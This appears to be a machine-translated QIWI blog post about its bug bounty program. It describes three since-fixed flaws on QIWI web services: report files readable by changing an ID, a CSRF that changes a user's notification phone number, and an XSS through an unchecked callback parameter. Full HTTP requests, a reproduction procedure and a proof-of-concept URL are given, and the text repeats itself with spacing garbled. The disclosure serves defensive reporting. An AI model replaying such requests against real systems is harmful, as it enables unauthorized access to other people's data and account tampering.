3 stories of Ethic Hack. How hackers help QIWI eliminate bugs
Not so long ago we launched one interesting program in QIWI - it is called Ethic Hack . In fact, we attract everyone to search for errors and bugs in the system interfaces. Found a bug, described it in a letter, received a reward from QIWI - this is how the scheme works. When the program was launched, the office was divided into 2 camps: some believed in success and the possibility of assistance from hackers, while others were skeptical about this venture. Then it was difficult to judge objectively - we had nothing but probable predictions. And now - there is. And we just want to share with you the accumulated cases.
Since the launch of the program, we have received information and fixed more than 150 vulnerabilities. We paid up to 150,000 rubles for certain vulnerabilities, but we cannot publish them in the examples.
')
So, the program went uphill. We have accumulated a lot of bugs, which we have fixed thanks to the assistance of hackers. Especially for you, we have highlighted several examples. Some real ethic hack stories.
Vulnerable host: sms.qiwi.ru
Vulnerability type: Directory bypass + weak ID check + no session check
What allows: To read other people's reports and get a crowd of company clients and their actions :)
Where exactly: sms. after Reports (123456 -> reports / 12/34 / 56.dat). Voila, you have someone else's report :)
Full GET request with an example of stealing someone else's report:
GET /bo/monitor/get_excel_format.jsp?html_file_name=reports/13/41/14.dat&report_name=report7&file_name=report7.xls&report_instance_id= HTTP / 1.1
Host: sms.qiwi.ru
User-Agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit / 536.28.10 (KHTML, like Gecko) Version / 6.0.3 Safari / 536.28.10
Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8
Origin: sms.qiwi.ru
Accept-Encoding: gzip, deflate
Accept-Language: ru
Referer: sms.qiwi.ru/bo/monitor/report_view.jsp?instance_id=144114
Cookie: JSESSIONID =; __utma = 200106670.88940096.1367226876.1367244987.1367247574.7; __utmc = 200106670; __utmz = 200106670.1367247574.7.5.utmcsr = google | utmccn = (organic) | utmcmd = organic | utmctr = site% 3Aqiwi.ru% 20inurl% Connection: keep-alive
Proxy-Connection: keep-alive
Vulnerable Host
ishop.qiwi.ru
Type of vulnerability in the framework of the classification OWASP TOP 10
A8 - CSRF
Where exactly
ishop.qiwi.ru/notificationSave.action
What allow
The vulnerability allows an attacker to change the notification settings (phone number, sms, etc.) of a user when this user navigates to a page specially created by the attacker.
How to repeat
1. Log in to the system under some user account.
2. Make settings for notifications.
3. Perform step 4 (test)
4. Send the following request using BurpSuite or its equivalent, substituting the received session cookie values (JSESSIONID)
POST /notificationSave.action HTTP / 1.1
Host: ishop.qiwi.ru
User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 20.0) Gecko / 20100101 Firefox / 20.0
Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8
Accept-Language: ru-RU, ru; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Referer: ishop.qiwi.ru/notifications.action
Cookie: __utma = 200106670.867508279.1368788962.1368788962.1369037765.2; __utmz = 200106670.1368788962.1.1.utmcsr = (direct) | utmccn = (direct) | utmcmd = (none); __utmc = 200106670; JSESSIONID = ;. node-ishop04.1; __utma = 47471167.1903908478.1369624211.1369650501.1369717004.6; __utmc = 47471167; __utmz = 47471167.1369717004.6.2.utmcsr = ishopnew.qiwi.ru | utmccn = (referral) | utmcmd = referral | utmcct = /; __utmb = 47471167.25.10.1369717004
Connection: keep-alive
Content-Type: application / x-www-form-urlencoded
Content-Length: 244
phone = & incomingBillMail = true & __ checkbox_incomingBillMail = true & __ checkbox_outgoingBillMail = true & __ checkbox_incomingPayMail = true & __ checkbox_incomingPaySMS = true & __ checkbox_cancelPayMail = true & __ checkbox_cancelPaySMS = true
5. Go to the notification settings page, make sure that the phone number and notification settings have been changed
Recommendations for elimination
Add a hidden form field containing a random value - a CSRF token.
www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
Error found on the site w.qiwi.ru.
There is no any validation and screening of the output for the callback parameter in the /user/communication/sendsms.action script.
It is possible to execute arbitrary code on the client side.
To conduct an attack, user registration in the system is not required. The user must open the javascript script suggested by the browser.
Request example
GET /user/communication/sendsms.action?number=&text=111&callback = <> "'; HTTP / 1.1
Host: w.qiwi.ru
User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 20.0) Gecko / 20100101 Firefox / 20.0
Accept: text / javascript, application / javascript, * / *
Accept-Language: ru-RU, ru; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: w.qiwi.ru/communication.action
Cookie: __utma = 153665022.317299647.1368525797.1368679677.1368684655.3; __utmz = 153665022.1368684655.3.3.utmcsr = google | utmccn = (organic) | utmcmd = organic | utmctr = qiwi% 20webmoney; JSESSIONID = .node-wb02.2; __utmc = 153665022; __utmb = 153665022.34.10.1368684655
Connection: keep-alive
Content-Length: 6
Answer
HTTP / 1.1 200 OK
Date: Thu, 16 May 2013 08:16:14 GMT
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check = 0, pre-check = 0
Pragma: no-cache
Content-Type: text / javascript; charset = utf-8
Content-Length: 142
Keep-Alive: timeout = 5, max = 100
Connection: Keep-Alive
<> "'; ({error: 0, data: {" confirmedBySms ": true," confirmLink ":" "," provider ":" 199 "," identifier ":" "}, messages: [], errors: [], fieldErrors: []})
Proof of concept
In Internet Explorer browser go to
w.qiwi.ru/user/communication/sendsms.action?number= text = 111 & callback = WScript.Echo ('XSS');
When checking the browser used Internet Explorer version 9.
Since the launch of the program, we have received information and fixed more than 150 vulnerabilities. We paid up to 150,000 rubles for certain vulnerabilities, but we cannot publish them in the examples.
')
So, the program went uphill. We have accumulated a lot of bugs, which we have fixed thanks to the assistance of hackers. Especially for you, we have highlighted several examples. Some real ethic hack stories.
Story One: read other people's reports.
Vulnerable host: sms.qiwi.ru
Vulnerability type: Directory bypass + weak ID check + no session check
What allows: To read other people's reports and get a crowd of company clients and their actions :)
Where exactly: sms. after Reports (123456 -> reports / 12/34 / 56.dat). Voila, you have someone else's report :)
Full GET request with an example of stealing someone else's report:
GET /bo/monitor/get_excel_format.jsp?html_file_name=reports/13/41/14.dat&report_name=report7&file_name=report7.xls&report_instance_id= HTTP / 1.1
Host: sms.qiwi.ru
User-Agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit / 536.28.10 (KHTML, like Gecko) Version / 6.0.3 Safari / 536.28.10
Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8
Origin: sms.qiwi.ru
Accept-Encoding: gzip, deflate
Accept-Language: ru
Referer: sms.qiwi.ru/bo/monitor/report_view.jsp?instance_id=144114
Cookie: JSESSIONID =; __utma = 200106670.88940096.1367226876.1367244987.1367247574.7; __utmc = 200106670; __utmz = 200106670.1367247574.7.5.utmcsr = google | utmccn = (organic) | utmcmd = organic | utmctr = site% 3Aqiwi.ru% 20inurl% Connection: keep-alive
Proxy-Connection: keep-alive
The second story: how was it possible to change the parameters of notifications.
Vulnerable Host
ishop.qiwi.ru
Type of vulnerability in the framework of the classification OWASP TOP 10
A8 - CSRF
Where exactly
ishop.qiwi.ru/notificationSave.action
What allow
The vulnerability allows an attacker to change the notification settings (phone number, sms, etc.) of a user when this user navigates to a page specially created by the attacker.
How to repeat
1. Log in to the system under some user account.
2. Make settings for notifications.
3. Perform step 4 (test)
4. Send the following request using BurpSuite or its equivalent, substituting the received session cookie values (JSESSIONID)
POST /notificationSave.action HTTP / 1.1
Host: ishop.qiwi.ru
User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 20.0) Gecko / 20100101 Firefox / 20.0
Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8
Accept-Language: ru-RU, ru; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Referer: ishop.qiwi.ru/notifications.action
Cookie: __utma = 200106670.867508279.1368788962.1368788962.1369037765.2; __utmz = 200106670.1368788962.1.1.utmcsr = (direct) | utmccn = (direct) | utmcmd = (none); __utmc = 200106670; JSESSIONID = ;. node-ishop04.1; __utma = 47471167.1903908478.1369624211.1369650501.1369717004.6; __utmc = 47471167; __utmz = 47471167.1369717004.6.2.utmcsr = ishopnew.qiwi.ru | utmccn = (referral) | utmcmd = referral | utmcct = /; __utmb = 47471167.25.10.1369717004
Connection: keep-alive
Content-Type: application / x-www-form-urlencoded
Content-Length: 244
phone = & incomingBillMail = true & __ checkbox_incomingBillMail = true & __ checkbox_outgoingBillMail = true & __ checkbox_incomingPayMail = true & __ checkbox_incomingPaySMS = true & __ checkbox_cancelPayMail = true & __ checkbox_cancelPaySMS = true
5. Go to the notification settings page, make sure that the phone number and notification settings have been changed
Recommendations for elimination
Add a hidden form field containing a random value - a CSRF token.
www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
Third story: arbitrary code.
Error found on the site w.qiwi.ru.
There is no any validation and screening of the output for the callback parameter in the /user/communication/sendsms.action script.
It is possible to execute arbitrary code on the client side.
To conduct an attack, user registration in the system is not required. The user must open the javascript script suggested by the browser.
Request example
GET /user/communication/sendsms.action?number=&text=111&callback = <> "'; HTTP / 1.1
Host: w.qiwi.ru
User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 20.0) Gecko / 20100101 Firefox / 20.0
Accept: text / javascript, application / javascript, * / *
Accept-Language: ru-RU, ru; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: w.qiwi.ru/communication.action
Cookie: __utma = 153665022.317299647.1368525797.1368679677.1368684655.3; __utmz = 153665022.1368684655.3.3.utmcsr = google | utmccn = (organic) | utmcmd = organic | utmctr = qiwi% 20webmoney; JSESSIONID = .node-wb02.2; __utmc = 153665022; __utmb = 153665022.34.10.1368684655
Connection: keep-alive
Content-Length: 6
Answer
HTTP / 1.1 200 OK
Date: Thu, 16 May 2013 08:16:14 GMT
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check = 0, pre-check = 0
Pragma: no-cache
Content-Type: text / javascript; charset = utf-8
Content-Length: 142
Keep-Alive: timeout = 5, max = 100
Connection: Keep-Alive
<> "'; ({error: 0, data: {" confirmedBySms ": true," confirmLink ":" "," provider ":" 199 "," identifier ":" "}, messages: [], errors: [], fieldErrors: []})
Proof of concept
In Internet Explorer browser go to
w.qiwi.ru/user/communication/sendsms.action?number= text = 111 & callback = WScript.Echo ('XSS');
When checking the browser used Internet Explorer version 9.
Source: https://habr.com/ru/post/187724/
All Articles